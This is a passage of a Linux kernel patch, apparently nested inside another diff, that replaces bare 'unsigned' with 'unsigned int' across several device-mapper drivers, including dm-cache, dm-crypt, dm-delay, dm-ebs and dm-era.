+@@ -673,7 +674,7 @@ static struct entry *h_lookup(struct smq_hash_table *ht, dm_oblock_t oblock)
+ 
+ static void h_remove(struct smq_hash_table *ht, struct entry *e)
+ {
+-	unsigned h = hash_64(from_oblock(e->oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(e->oblock), ht->hash_bits);
+ 	struct entry *prev;
+ 
+ 	/*
+@@ -689,16 +690,16 @@ static void h_remove(struct smq_hash_table *ht, struct entry *e)
+ 
+ struct entry_alloc {
+ 	struct entry_space *es;
+-	unsigned begin;
++	unsigned int begin;
+ 
+-	unsigned nr_allocated;
++	unsigned int nr_allocated;
+ 	struct ilist free;
+ };
+ 
+ static void init_allocator(struct entry_alloc *ea, struct entry_space *es,
+-			   unsigned begin, unsigned end)
++			   unsigned int begin, unsigned int end)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	ea->es = es;
+ 	ea->nr_allocated = 0u;
+@@ -742,7 +743,7 @@ static struct entry *alloc_entry(struct entry_alloc *ea)
+ /*
+  * This assumes the cblock hasn't already been allocated.
+  */
+-static struct entry *alloc_particular_entry(struct entry_alloc *ea, unsigned i)
++static struct entry *alloc_particular_entry(struct entry_alloc *ea, unsigned int i)
+ {
+ 	struct entry *e = __get_entry(ea->es, ea->begin + i);
+ 
+@@ -770,12 +771,12 @@ static bool allocator_empty(struct entry_alloc *ea)
+ 	return l_empty(&ea->free);
+ }
+ 
+-static unsigned get_index(struct entry_alloc *ea, struct entry *e)
++static unsigned int get_index(struct entry_alloc *ea, struct entry *e)
+ {
+ 	return to_index(ea->es, e) - ea->begin;
+ }
+ 
+-static struct entry *get_entry(struct entry_alloc *ea, unsigned index)
++static struct entry *get_entry(struct entry_alloc *ea, unsigned int index)
+ {
+ 	return __get_entry(ea->es, ea->begin + index);
+ }
+@@ -800,9 +801,9 @@ struct smq_policy {
+ 	sector_t cache_block_size;
+ 
+ 	sector_t hotspot_block_size;
+-	unsigned nr_hotspot_blocks;
+-	unsigned cache_blocks_per_hotspot_block;
+-	unsigned hotspot_level_jump;
++	unsigned int nr_hotspot_blocks;
++	unsigned int cache_blocks_per_hotspot_block;
++	unsigned int hotspot_level_jump;
+ 
+ 	struct entry_space es;
+ 	struct entry_alloc writeback_sentinel_alloc;
+@@ -831,7 +832,7 @@ struct smq_policy {
+ 	 * Keeps track of time, incremented by the core.  We use this to
+ 	 * avoid attributing multiple hits within the same tick.
+ 	 */
+-	unsigned tick;
++	unsigned int tick;
+ 
+ 	/*
+ 	 * The hash tables allows us to quickly find an entry by origin
+@@ -846,8 +847,8 @@ struct smq_policy {
+ 	bool current_demote_sentinels;
+ 	unsigned long next_demote_period;
+ 
+-	unsigned write_promote_level;
+-	unsigned read_promote_level;
++	unsigned int write_promote_level;
++	unsigned int read_promote_level;
+ 
+ 	unsigned long next_hotspot_period;
+ 	unsigned long next_cache_period;
+@@ -859,24 +860,24 @@ struct smq_policy {
+ 
+ /*----------------------------------------------------------------*/
+ 
+-static struct entry *get_sentinel(struct entry_alloc *ea, unsigned level, bool which)
++static struct entry *get_sentinel(struct entry_alloc *ea, unsigned int level, bool which)
+ {
+ 	return get_entry(ea, which ? level : NR_CACHE_LEVELS + level);
+ }
+ 
+-static struct entry *writeback_sentinel(struct smq_policy *mq, unsigned level)
++static struct entry *writeback_sentinel(struct smq_policy *mq, unsigned int level)
+ {
+ 	return get_sentinel(&mq->writeback_sentinel_alloc, level, mq->current_writeback_sentinels);
+ }
+ 
+-static struct entry *demote_sentinel(struct smq_policy *mq, unsigned level)
++static struct entry *demote_sentinel(struct smq_policy *mq, unsigned int level)
+ {
+ 	return get_sentinel(&mq->demote_sentinel_alloc, level, mq->current_demote_sentinels);
+ }
+ 
+ static void __update_writeback_sentinels(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct queue *q = &mq->dirty;
+ 	struct entry *sentinel;
+ 
+@@ -889,7 +890,7 @@ static void __update_writeback_sentinels(struct smq_policy *mq)
+ 
+ static void __update_demote_sentinels(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct queue *q = &mq->clean;
+ 	struct entry *sentinel;
+ 
+@@ -917,7 +918,7 @@ static void update_sentinels(struct smq_policy *mq)
+ 
+ static void __sentinels_init(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct entry *sentinel;
+ 
+ 	for (level = 0; level < NR_CACHE_LEVELS; level++) {
+@@ -1008,7 +1009,7 @@ static void requeue(struct smq_policy *mq, struct entry *e)
+ 	}
+ }
+ 
+-static unsigned default_promote_level(struct smq_policy *mq)
++static unsigned int default_promote_level(struct smq_policy *mq)
+ {
+ 	/*
+ 	 * The promote level depends on the current performance of the
+@@ -1030,9 +1031,9 @@ static unsigned default_promote_level(struct smq_policy *mq)
+ 		1, 1, 1, 2, 4, 6, 7, 8, 7, 6, 4, 4, 3, 3, 2, 2, 1
+ 	};
+ 
+-	unsigned hits = mq->cache_stats.hits;
+-	unsigned misses = mq->cache_stats.misses;
+-	unsigned index = safe_div(hits << 4u, hits + misses);
++	unsigned int hits = mq->cache_stats.hits;
++	unsigned int misses = mq->cache_stats.misses;
++	unsigned int index = safe_div(hits << 4u, hits + misses);
+ 	return table[index];
+ }
+ 
+@@ -1042,7 +1043,7 @@ static void update_promote_levels(struct smq_policy *mq)
+ 	 * If there are unused cache entries then we want to be really
+ 	 * eager to promote.
+ 	 */
+-	unsigned threshold_level = allocator_empty(&mq->cache_alloc) ?
++	unsigned int threshold_level = allocator_empty(&mq->cache_alloc) ?
+ 		default_promote_level(mq) : (NR_HOTSPOT_LEVELS / 2u);
+ 
+ 	threshold_level = max(threshold_level, NR_HOTSPOT_LEVELS);
+@@ -1124,7 +1125,7 @@ static void end_cache_period(struct smq_policy *mq)
+ #define CLEAN_TARGET 25u
+ #define FREE_TARGET 25u
+ 
+-static unsigned percent_to_target(struct smq_policy *mq, unsigned p)
++static unsigned int percent_to_target(struct smq_policy *mq, unsigned int p)
+ {
+ 	return from_cblock(mq->cache_size) * p / 100u;
+ }
+@@ -1150,7 +1151,7 @@ static bool clean_target_met(struct smq_policy *mq, bool idle)
+ 
+ static bool free_target_met(struct smq_policy *mq)
+ {
+-	unsigned nr_free;
++	unsigned int nr_free;
+ 
+ 	nr_free = from_cblock(mq->cache_size) - mq->cache_alloc.nr_allocated;
+ 	return (nr_free + btracker_nr_demotions_queued(mq->bg_work)) >=
+@@ -1300,7 +1301,7 @@ static dm_oblock_t to_hblock(struct smq_policy *mq, dm_oblock_t b)
+ 
+ static struct entry *update_hotspot_queue(struct smq_policy *mq, dm_oblock_t b)
+ {
+-	unsigned hi;
++	unsigned int hi;
+ 	dm_oblock_t hb = to_hblock(mq, b);
+ 	struct entry *e = h_lookup(&mq->hotspot_table, hb);
+ 
+@@ -1549,7 +1550,7 @@ static void smq_clear_dirty(struct dm_cache_policy *p, dm_cblock_t cblock)
+ 	spin_unlock_irqrestore(&mq->lock, flags);
+ }
+ 
+-static unsigned random_level(dm_cblock_t cblock)
++static unsigned int random_level(dm_cblock_t cblock)
+ {
+ 	return hash_32(from_cblock(cblock), 9) & (NR_CACHE_LEVELS - 1);
+ }
+@@ -1660,7 +1661,7 @@ static int mq_set_config_value(struct dm_cache_policy *p,
+ }
+ 
+ static int mq_emit_config_values(struct dm_cache_policy *p, char *result,
+-				 unsigned maxlen, ssize_t *sz_ptr)
++				 unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 
+@@ -1699,16 +1700,16 @@ static void init_policy_functions(struct smq_policy *mq, bool mimic_mq)
+ 
+ static bool too_many_hotspot_blocks(sector_t origin_size,
+ 				    sector_t hotspot_block_size,
+-				    unsigned nr_hotspot_blocks)
++				    unsigned int nr_hotspot_blocks)
+ {
+ 	return (hotspot_block_size * nr_hotspot_blocks) > origin_size;
+ }
+ 
+ static void calc_hotspot_params(sector_t origin_size,
+ 				sector_t cache_block_size,
+-				unsigned nr_cache_blocks,
++				unsigned int nr_cache_blocks,
+ 				sector_t *hotspot_block_size,
+-				unsigned *nr_hotspot_blocks)
++				unsigned int *nr_hotspot_blocks)
+ {
+ 	*hotspot_block_size = cache_block_size * 16u;
+ 	*nr_hotspot_blocks = max(nr_cache_blocks / 4u, 1024u);
+@@ -1724,9 +1725,9 @@ static struct dm_cache_policy *__smq_create(dm_cblock_t cache_size,
+ 					    bool mimic_mq,
+ 					    bool migrations_allowed)
+ {
+-	unsigned i;
+-	unsigned nr_sentinels_per_queue = 2u * NR_CACHE_LEVELS;
+-	unsigned total_sentinels = 2u * nr_sentinels_per_queue;
++	unsigned int i;
++	unsigned int nr_sentinels_per_queue = 2u * NR_CACHE_LEVELS;
++	unsigned int total_sentinels = 2u * nr_sentinels_per_queue;
+ 	struct smq_policy *mq = kzalloc(sizeof(*mq), GFP_KERNEL);
+ 
+ 	if (!mq)
+diff --git a/drivers/md/dm-cache-policy.c b/drivers/md/dm-cache-policy.c
+index c1a3cee99b445..2e58bbcf3e3bd 100644
+--- a/drivers/md/dm-cache-policy.c
++++ b/drivers/md/dm-cache-policy.c
+@@ -154,7 +154,7 @@ const char *dm_cache_policy_get_name(struct dm_cache_policy *p)
+ }
+ EXPORT_SYMBOL_GPL(dm_cache_policy_get_name);
+ 
+-const unsigned *dm_cache_policy_get_version(struct dm_cache_policy *p)
++const unsigned int *dm_cache_policy_get_version(struct dm_cache_policy *p)
+ {
+ 	struct dm_cache_policy_type *t = p->private;
+ 
+diff --git a/drivers/md/dm-cache-policy.h b/drivers/md/dm-cache-policy.h
+index 06eb31af626f1..6ba3e9c91af53 100644
+--- a/drivers/md/dm-cache-policy.h
++++ b/drivers/md/dm-cache-policy.h
+@@ -128,7 +128,7 @@ struct dm_cache_policy {
+ 	 * Configuration.
+ 	 */
+ 	int (*emit_config_values)(struct dm_cache_policy *p, char *result,
+-				  unsigned maxlen, ssize_t *sz_ptr);
++				  unsigned int maxlen, ssize_t *sz_ptr);
+ 	int (*set_config_value)(struct dm_cache_policy *p,
+ 				const char *key, const char *value);
+ 
+@@ -157,7 +157,7 @@ struct dm_cache_policy_type {
+ 	 * what gets passed on the target line to select your policy.
+ 	 */
+ 	char name[CACHE_POLICY_NAME_SIZE];
+-	unsigned version[CACHE_POLICY_VERSION_SIZE];
++	unsigned int version[CACHE_POLICY_VERSION_SIZE];
+ 
+ 	/*
+ 	 * For use by an alias dm_cache_policy_type to point to the
+diff --git a/drivers/md/dm-cache-target.c b/drivers/md/dm-cache-target.c
+index 17fde3e5a1f7b..8f7426b71e025 100644
+--- a/drivers/md/dm-cache-target.c
++++ b/drivers/md/dm-cache-target.c
+@@ -275,7 +275,7 @@ enum cache_io_mode {
+ struct cache_features {
+ 	enum cache_metadata_mode mode;
+ 	enum cache_io_mode io_mode;
+-	unsigned metadata_version;
++	unsigned int metadata_version;
+ 	bool discard_passdown:1;
+ };
+ 
+@@ -362,7 +362,7 @@ struct cache {
+ 	 * Rather than reconstructing the table line for the status we just
+ 	 * save it and regurgitate.
+ 	 */
+-	unsigned nr_ctr_args;
++	unsigned int nr_ctr_args;
+ 	const char **ctr_args;
+ 
+ 	struct dm_kcopyd_client *copier;
+@@ -378,7 +378,7 @@ struct cache {
+ 	unsigned long *dirty_bitset;
+ 	atomic_t nr_dirty;
+ 
+-	unsigned policy_nr_args;
++	unsigned int policy_nr_args;
+ 	struct dm_cache_policy *policy;
+ 
+ 	/*
+@@ -409,7 +409,7 @@ struct cache {
+ 
+ struct per_bio_data {
+ 	bool tick:1;
+-	unsigned req_nr:2;
++	unsigned int req_nr:2;
+ 	struct dm_bio_prison_cell_v2 *cell;
+ 	struct dm_hook_info hook_info;
+ 	sector_t len;
+@@ -517,7 +517,7 @@ static void build_key(dm_oblock_t begin, dm_oblock_t end, struct dm_cell_key_v2
+ #define WRITE_LOCK_LEVEL 0
+ #define READ_WRITE_LOCK_LEVEL 1
+ 
+-static unsigned lock_level(struct bio *bio)
++static unsigned int lock_level(struct bio *bio)
+ {
+ 	return bio_data_dir(bio) == WRITE ?
+ 		WRITE_LOCK_LEVEL :
+@@ -1884,7 +1884,7 @@ static void check_migrations(struct work_struct *ws)
+  */
+ static void destroy(struct cache *cache)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	mempool_exit(&cache->migration_pool);
+ 
+@@ -2124,7 +2124,7 @@ static int parse_features(struct cache_args *ca, struct dm_arg_set *as,
+ 	};
+ 
+ 	int r, mode_ctr = 0;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg;
+ 	struct cache_features *cf = &ca->features;
+ 
+@@ -2544,7 +2544,7 @@ bad:
+ 
+ static int copy_ctr_args(struct cache *cache, int argc, const char **argv)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	const char **copy;
+ 
+ 	copy = kcalloc(argc, sizeof(*copy), GFP_KERNEL);
+@@ -2566,7 +2566,7 @@ static int copy_ctr_args(struct cache *cache, int argc, const char **argv)
+ 	return 0;
+ }
+ 
+-static int cache_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int cache_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r = -EINVAL;
+ 	struct cache_args *ca;
+@@ -2669,7 +2669,7 @@ static int write_dirty_bitset(struct cache *cache)
+ 
+ static int write_discard_bitset(struct cache *cache)
+ {
+-	unsigned i, r;
++	unsigned int i, r;
+ 
+ 	if (get_cache_mode(cache) >= CM_READ_ONLY)
+ 		return -EINVAL;
+@@ -2983,11 +2983,11 @@ static void cache_resume(struct dm_target *ti)
+ }
+ 
+ static void emit_flags(struct cache *cache, char *result,
+-		       unsigned maxlen, ssize_t *sz_ptr)
++		       unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 	struct cache_features *cf = &cache->features;
+-	unsigned count = (cf->metadata_version == 2) + !cf->discard_passdown + 1;
++	unsigned int count = (cf->metadata_version == 2) + !cf->discard_passdown + 1;
+ 
+ 	DMEMIT("%u ", count);
+ 
+@@ -3027,10 +3027,10 @@ static void emit_flags(struct cache *cache, char *result,
+  * <policy name> <#policy args> <policy args>* <cache metadata mode> <needs_check>
+  */
+ static void cache_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	ssize_t sz = 0;
+ 	dm_block_t nr_free_blocks_metadata = 0;
+ 	dm_block_t nr_blocks_metadata = 0;
+@@ -3067,18 +3067,18 @@ static void cache_status(struct dm_target *ti, status_type_t type,
+ 		residency = policy_residency(cache->policy);
+ 
+ 		DMEMIT("%u %llu/%llu %llu %llu/%llu %u %u %u %u %u %u %lu ",
+-		       (unsigned)DM_CACHE_METADATA_BLOCK_SIZE,
++		       (unsigned int)DM_CACHE_METADATA_BLOCK_SIZE,
+ 		       (unsigned long long)(nr_blocks_metadata - nr_free_blocks_metadata),
+ 		       (unsigned long long)nr_blocks_metadata,
+ 		       (unsigned long long)cache->sectors_per_block,
+ 		       (unsigned long long) from_cblock(residency),
+ 		       (unsigned long long) from_cblock(cache->cache_size),
+-		       (unsigned) atomic_read(&cache->stats.read_hit),
+-		       (unsigned) atomic_read(&cache->stats.read_miss),
+-		       (unsigned) atomic_read(&cache->stats.write_hit),
+-		       (unsigned) atomic_read(&cache->stats.write_miss),
+-		       (unsigned) atomic_read(&cache->stats.demotion),
+-		       (unsigned) atomic_read(&cache->stats.promotion),
++		       (unsigned int) atomic_read(&cache->stats.read_hit),
++		       (unsigned int) atomic_read(&cache->stats.read_miss),
++		       (unsigned int) atomic_read(&cache->stats.write_hit),
++		       (unsigned int) atomic_read(&cache->stats.write_miss),
++		       (unsigned int) atomic_read(&cache->stats.demotion),
++		       (unsigned int) atomic_read(&cache->stats.promotion),
+ 		       (unsigned long) atomic_read(&cache->nr_dirty));
+ 
+ 		emit_flags(cache, result, maxlen, &sz);
+@@ -3257,11 +3257,11 @@ static int request_invalidation(struct cache *cache, struct cblock_range *range)
+ 	return r;
+ }
+ 
+-static int process_invalidate_cblocks_message(struct cache *cache, unsigned count,
++static int process_invalidate_cblocks_message(struct cache *cache, unsigned int count,
+ 					      const char **cblock_ranges)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	struct cblock_range range;
+ 
+ 	if (!passthrough_mode(cache)) {
+@@ -3298,8 +3298,8 @@ static int process_invalidate_cblocks_message(struct cache *cache, unsigned coun
+  *
+  * The key migration_threshold is supported by the cache target core.
+  */
+-static int cache_message(struct dm_target *ti, unsigned argc, char **argv,
+-			 char *result, unsigned maxlen)
++static int cache_message(struct dm_target *ti, unsigned int argc, char **argv,
++			 char *result, unsigned int maxlen)
+ {
+ 	struct cache *cache = ti->private;
+ 
+diff --git a/drivers/md/dm-core.h b/drivers/md/dm-core.h
+index 6c6bd24774f25..28c641352de9b 100644
+--- a/drivers/md/dm-core.h
++++ b/drivers/md/dm-core.h
+@@ -119,7 +119,7 @@ struct mapped_device {
+ 	struct dm_stats stats;
+ 
+ 	/* the number of internal suspends */
+-	unsigned internal_suspend_count;
++	unsigned int internal_suspend_count;
+ 
+ 	int swap_bios;
+ 	struct semaphore swap_bios_semaphore;
+@@ -326,9 +326,9 @@ static inline struct completion *dm_get_completion_from_kobject(struct kobject *
+ 	return &container_of(kobj, struct dm_kobject_holder, kobj)->completion;
+ }
+ 
+-unsigned __dm_get_module_param(unsigned *module_param, unsigned def, unsigned max);
++unsigned int __dm_get_module_param(unsigned int *module_param, unsigned int def, unsigned int max);
+ 
+-static inline bool dm_message_test_buffer_overflow(char *result, unsigned maxlen)
++static inline bool dm_message_test_buffer_overflow(char *result, unsigned int maxlen)
+ {
+ 	return !maxlen || strlen(result) + 1 >= maxlen;
+ }
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index dc2d0d61ade93..ee269b1d09fac 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -173,14 +173,14 @@ struct crypt_config {
+ 	} iv_gen_private;
+ 	u64 iv_offset;
+ 	unsigned int iv_size;
+-	unsigned short int sector_size;
++	unsigned short sector_size;
+ 	unsigned char sector_shift;
+ 
+ 	union {
+ 		struct crypto_skcipher **tfms;
+ 		struct crypto_aead **tfms_aead;
+ 	} cipher_tfm;
+-	unsigned tfms_count;
++	unsigned int tfms_count;
+ 	unsigned long cipher_flags;
+ 
+ 	/*
+@@ -214,7 +214,7 @@ struct crypt_config {
+ 	 * pool for per bio private data, crypto requests,
+ 	 * encryption requeusts/buffer pages and integrity tags
+ 	 */
+-	unsigned tag_pool_max_sectors;
++	unsigned int tag_pool_max_sectors;
+ 	mempool_t tag_pool;
+ 	mempool_t req_pool;
+ 	mempool_t page_pool;
+@@ -231,7 +231,7 @@ struct crypt_config {
+ #define POOL_ENTRY_SIZE	512
+ 
+ static DEFINE_SPINLOCK(dm_crypt_clients_lock);
+-static unsigned dm_crypt_clients_n = 0;
++static unsigned int dm_crypt_clients_n = 0;
+ static volatile unsigned long dm_crypt_pages_per_client;
+ #define DM_CRYPT_MEMORY_PERCENT			2
+ #define DM_CRYPT_MIN_PAGES_PER_CLIENT		(BIO_MAX_VECS * 16)
+@@ -356,7 +356,7 @@ static int crypt_iv_essiv_gen(struct crypt_config *cc, u8 *iv,
+ static int crypt_iv_benbi_ctr(struct crypt_config *cc, struct dm_target *ti,
+ 			      const char *opts)
+ {
+-	unsigned bs;
++	unsigned int bs;
+ 	int log;
+ 
+ 	if (crypt_integrity_aead(cc))
+@@ -1466,7 +1466,7 @@ static void kcryptd_async_done(struct crypto_async_request *async_req,
+ static int crypt_alloc_req_skcipher(struct crypt_config *cc,
+ 				     struct convert_context *ctx)
+ {
+-	unsigned key_index = ctx->cc_sector & (cc->tfms_count - 1);
++	unsigned int key_index = ctx->cc_sector & (cc->tfms_count - 1);
+ 
+ 	if (!ctx->r.req) {
+ 		ctx->r.req = mempool_alloc(&cc->req_pool, in_interrupt() ? GFP_ATOMIC : GFP_NOIO);
+@@ -1660,13 +1660,13 @@ static void crypt_free_buffer_pages(struct crypt_config *cc, struct bio *clone);
+  * non-blocking allocations without a mutex first but on failure we fallback
+  * to blocking allocations with a mutex.
+  */
+-static struct bio *crypt_alloc_buffer(struct dm_crypt_io *io, unsigned size)
++static struct bio *crypt_alloc_buffer(struct dm_crypt_io *io, unsigned int size)
+ {
+ 	struct crypt_config *cc = io->cc;
+ 	struct bio *clone;
+ 	unsigned int nr_iovecs = (size + PAGE_SIZE - 1) >> PAGE_SHIFT;
+ 	gfp_t gfp_mask = GFP_NOWAIT | __GFP_HIGHMEM;
+-	unsigned i, len, remaining_size;
++	unsigned int i, len, remaining_size;
+ 	struct page *page;
+ 
+ retry:
+@@ -1806,7 +1806,7 @@ static void crypt_endio(struct bio *clone)
+ {
+ 	struct dm_crypt_io *io = clone->bi_private;
+ 	struct crypt_config *cc = io->cc;
+-	unsigned rw = bio_data_dir(clone);
++	unsigned int rw = bio_data_dir(clone);
+ 	blk_status_t error;
+ 
+ 	/*
+@@ -2261,7 +2261,7 @@ static void crypt_free_tfms_aead(struct crypt_config *cc)
+ 
+ static void crypt_free_tfms_skcipher(struct crypt_config *cc)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	if (!cc->cipher_tfm.tfms)
+ 		return;
+@@ -2286,7 +2286,7 @@ static void crypt_free_tfms(struct crypt_config *cc)
+ 
+ static int crypt_alloc_tfms_skcipher(struct crypt_config *cc, char *ciphermode)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	int err;
+ 
+ 	cc->cipher_tfm.tfms = kcalloc(cc->tfms_count,
+@@ -2344,12 +2344,12 @@ static int crypt_alloc_tfms(struct crypt_config *cc, char *ciphermode)
+ 		return crypt_alloc_tfms_skcipher(cc, ciphermode);
+ }
+ 
+-static unsigned crypt_subkey_size(struct crypt_config *cc)
++static unsigned int crypt_subkey_size(struct crypt_config *cc)
+ {
+ 	return (cc->key_size - cc->key_extra_size) >> ilog2(cc->tfms_count);
+ }
+ 
+-static unsigned crypt_authenckey_size(struct crypt_config *cc)
++static unsigned int crypt_authenckey_size(struct crypt_config *cc)
+ {
+ 	return crypt_subkey_size(cc) + RTA_SPACE(sizeof(struct crypto_authenc_key_param));
+ }
+@@ -2360,7 +2360,7 @@ static unsigned crypt_authenckey_size(struct crypt_config *cc)
+  * This funcion converts cc->key to this special format.
+  */
+ static void crypt_copy_authenckey(char *p, const void *key,
+-				  unsigned enckeylen, unsigned authkeylen)
++				  unsigned int enckeylen, unsigned int authkeylen)
+ {
+ 	struct crypto_authenc_key_param *param;
+ 	struct rtattr *rta;
+@@ -2378,7 +2378,7 @@ static void crypt_copy_authenckey(char *p, const void *key,
+ 
+ static int crypt_setkey(struct crypt_config *cc)
+ {
+-	unsigned subkey_size;
++	unsigned int subkey_size;
+ 	int err = 0, i, r;
+ 
+ 	/* Ignore extra keys (which are used for IV etc) */
+@@ -3417,7 +3417,7 @@ static int crypt_map(struct dm_target *ti, struct bio *bio)
+ 	crypt_io_init(io, cc, bio, dm_target_offset(ti, bio->bi_iter.bi_sector));
+ 
+ 	if (cc->on_disk_tag_size) {
+-		unsigned tag_len = cc->on_disk_tag_size * (bio_sectors(bio) >> cc->sector_shift);
++		unsigned int tag_len = cc->on_disk_tag_size * (bio_sectors(bio) >> cc->sector_shift);
+ 
+ 		if (unlikely(tag_len > KMALLOC_MAX_SIZE) ||
+ 		    unlikely(!(io->integrity_metadata = kmalloc(tag_len,
+@@ -3445,14 +3445,14 @@ static int crypt_map(struct dm_target *ti, struct bio *bio)
+ 
+ static char hex2asc(unsigned char c)
+ {
+-	return c + '0' + ((unsigned)(9 - c) >> 4 & 0x27);
++	return c + '0' + ((unsigned int)(9 - c) >> 4 & 0x27);
+ }
+ 
+ static void crypt_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct crypt_config *cc = ti->private;
+-	unsigned i, sz = 0;
++	unsigned int i, sz = 0;
+ 	int num_feature_args = 0;
+ 
+ 	switch (type) {
+@@ -3568,8 +3568,8 @@ static void crypt_resume(struct dm_target *ti)
+  *	key set <key>
+  *	key wipe
+  */
+-static int crypt_message(struct dm_target *ti, unsigned argc, char **argv,
+-			 char *result, unsigned maxlen)
++static int crypt_message(struct dm_target *ti, unsigned int argc, char **argv,
++			 char *result, unsigned int maxlen)
+ {
+ 	struct crypt_config *cc = ti->private;
+ 	int key_size, ret = -EINVAL;
+@@ -3630,10 +3630,10 @@ static void crypt_io_hints(struct dm_target *ti, struct queue_limits *limits)
+ 	limits->max_segment_size = PAGE_SIZE;
+ 
+ 	limits->logical_block_size =
+-		max_t(unsigned, limits->logical_block_size, cc->sector_size);
++		max_t(unsigned int, limits->logical_block_size, cc->sector_size);
+ 	limits->physical_block_size =
+-		max_t(unsigned, limits->physical_block_size, cc->sector_size);
+-	limits->io_min = max_t(unsigned, limits->io_min, cc->sector_size);
++		max_t(unsigned int, limits->physical_block_size, cc->sector_size);
++	limits->io_min = max_t(unsigned int, limits->io_min, cc->sector_size);
+ 	limits->dma_alignment = limits->logical_block_size - 1;
+ }
+ 
+diff --git a/drivers/md/dm-delay.c b/drivers/md/dm-delay.c
+index 869afef5654ae..02b8f4e818276 100644
+--- a/drivers/md/dm-delay.c
++++ b/drivers/md/dm-delay.c
+@@ -20,8 +20,8 @@
+ struct delay_class {
+ 	struct dm_dev *dev;
+ 	sector_t start;
+-	unsigned delay;
+-	unsigned ops;
++	unsigned int delay;
++	unsigned int ops;
+ };
+ 
+ struct delay_c {
+@@ -305,7 +305,7 @@ static int delay_map(struct dm_target *ti, struct bio *bio)
+ 	DMEMIT("%s %llu %u", (c)->dev->name, (unsigned long long)(c)->start, (c)->delay)
+ 
+ static void delay_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct delay_c *dc = ti->private;
+ 	int sz = 0;
+diff --git a/drivers/md/dm-ebs-target.c b/drivers/md/dm-ebs-target.c
+index 512cc6cea095a..7606c6695a0e2 100644
+--- a/drivers/md/dm-ebs-target.c
++++ b/drivers/md/dm-ebs-target.c
+@@ -390,7 +390,7 @@ static int ebs_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static void ebs_status(struct dm_target *ti, status_type_t type,
+-		       unsigned status_flags, char *result, unsigned maxlen)
++		       unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct ebs_c *ec = ti->private;
+ 
+diff --git a/drivers/md/dm-era-target.c b/drivers/md/dm-era-target.c
+index e92c1afc3677f..a96290103cca8 100644
+--- a/drivers/md/dm-era-target.c
++++ b/drivers/md/dm-era-target.c
+@@ -51,7 +51,7 @@ static void writeset_free(struct writeset *ws)
+ }
+ 
+ static int setup_on_disk_bitset(struct dm_disk_bitset *info,
+-				unsigned nr_bits, dm_block_t *root)
++				unsigned int nr_bits, dm_block_t *root)
+ {
+ 	int r;
+ 
+@@ -62,7 +62,7 @@ static int setup_on_disk_bitset(struct dm_disk_bitset *info,
+ 	return dm_bitset_resize(info, *root, 0, nr_bits, false, root);
+ }
+ 
+-static size_t bitset_size(unsigned nr_bits)
++static size_t bitset_size(unsigned int nr_bits)
+ {
+ 	return sizeof(unsigned long) * dm_div_up(nr_bits, BITS_PER_LONG);
+ }
+@@ -323,10 +323,10 @@ static int superblock_lock(struct era_metadata *md,
+ static int superblock_all_zeroes(struct dm_block_manager *bm, bool *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -363,12 +363,12 @@ static void ws_unpack(const struct writeset_disk *disk, struct writeset_metadata
+ 	core->root = le64_to_cpu(disk->root);
+ }
+ 
+-static void ws_inc(void *context, const void *value, unsigned count)
++static void ws_inc(void *context, const void *value, unsigned int count)
+ {
+ 	struct era_metadata *md = context;
+ 	struct writeset_disk ws_d;
+ 	dm_block_t b;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		memcpy(&ws_d, value + (i * sizeof(ws_d)), sizeof(ws_d));
+@@ -377,12 +377,12 @@ static void ws_inc(void *context, const void *value, unsigned count)
+ 	}
+ }
+ 
+-static void ws_dec(void *context, const void *value, unsigned count)
++static void ws_dec(void *context, const void *value, unsigned int count)
+ {
+ 	struct era_metadata *md = context;
+ 	struct writeset_disk ws_d;
+ 	dm_block_t b;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		memcpy(&ws_d, value + (i * sizeof(ws_d)), sizeof(ws_d));
+@@ -667,7 +667,7 @@ static void swap_writeset(struct era_metadata *md, struct writeset *new_writeset
+  *--------------------------------------------------------------*/
+ struct digest {
+ 	uint32_t era;
+-	unsigned nr_bits, current_bit;
++	unsigned int nr_bits, current_bit;
+ 	struct writeset_metadata writeset;
+ 	__le32 value;
+ 	struct dm_disk_bitset info;
+@@ -702,7 +702,7 @@ static int metadata_digest_transcribe_writeset(struct era_metadata *md,
+ {
+ 	int r;
+ 	bool marked;
+-	unsigned b, e = min(d->current_bit + INSERTS_PER_STEP, d->nr_bits);
